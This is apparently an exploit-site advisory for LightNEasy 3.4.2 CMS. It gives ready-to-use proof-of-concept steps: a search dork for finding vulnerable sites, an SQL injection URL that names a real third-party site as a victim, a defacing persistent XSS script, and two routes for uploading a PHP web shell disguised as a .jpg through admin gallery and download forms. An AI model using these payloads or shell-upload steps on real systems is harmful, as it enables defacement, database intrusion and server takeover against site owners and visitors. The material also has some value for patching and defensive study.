LightNEasy 3.4.2 Multiple Vulnerabilities



EKU-ID: 1256 CVE: OSVDB-ID:
Author: X-Cisadane Published: 2011-11-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : LightNEasy 3.4.2 Multiple Vulnerabilities
: # Date : 05 November 2011
: # Author : X-Cisadane
: # Software Link : http://www.lightneasy.org/downloads.php
: # Version : 3.4.2
: # Category : Web Applications 
: # Vulnerability : SQL Injection, Persistent XSS & Upload Shell
: # Tested On : Google Chrome 14.0.835 (Windows)
: # Dorks : inurl:LightNEasy.php?page OR intext:Powered by LightNEasy
: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari
:-------------------------------------------------------------------------------------------------------------------------: 

POC :
1.SQL Injection Vulnerability 
- Open Victim Website : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=news&id='1
Example : 
http://demo.lightneasy.org/LightNEasy.php?page=news&id='1
http://lightneasy.org/demo/LightNEasy.php?page=news&id='1
http://www.houstonbicyclemuseum.org/LightNEasy.php?page=news&id='1

2.Persistent XSS Vulnerability
- Open Victim Website : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=news
- Fill The Comment With This Script : <script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : XCode, Hacker Cisadane, Depok Cyber, Muslim Hackers, Dunia Santai, Borneo Crew, Jiban Crew, etc<br/>Please patch your system";</script>
- ReOpen The URL  (http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=news)

Pic : http://i40.tinypic.com/1zdw74j.png

3.Persistent XSS Vulnerability (Required Admin Previlleges!)
- Logon As Admin & Go To : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=survey
- Fill Survey Name Field, With This Script : <script>alert("xss")</script>
- ReOpen The URL (http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=survey)

Pic : http://i44.tinypic.com/5nk7xu.png

4.Upload Shell Vulnerability (Required Admin Previlleges!)
- Logon As Admin & Go To : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=gallery
- Create Gallery. Gallery Name : Test (For Example).
- Upload Image. Image Name : Shell.jpg. 
Choose File (Browse Your Shell.php). Upload To Gallery : Test (For Example). 
Click Upload Image.
- Voila! Open URL : http://<site>/<LightNEasy Installation Path>/galeries/GALLERY NAME HERE/YOUR SHELL.PHP HERE
Example : http://localhost/webtest/galeries/test/c100shell.php

Pic : http://i44.tinypic.com/v63v2q.png

5.Upload Shell Vulnerability (Required Admin Previlleges!)
- Logon As Admin & Go To : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=downloads
- Fill Downloads Name : Shell.jpg. 
Then Upload Your File, Choose File (Browse Your Shell.php). 
Fill File Name : Shell.jpg (For Example). 
Then Scroll Down On The Options, Select : Downloads. 
Finally Click Add Download!
- Voila! Open URL : http://<site>/<LightNEasy Installation Path>/downloads/YOUR SHELL.PHP HERE
Example : http://localhost/webtest/downloads/c100shell.php

-= Regards =-
Dwi X-Cisadane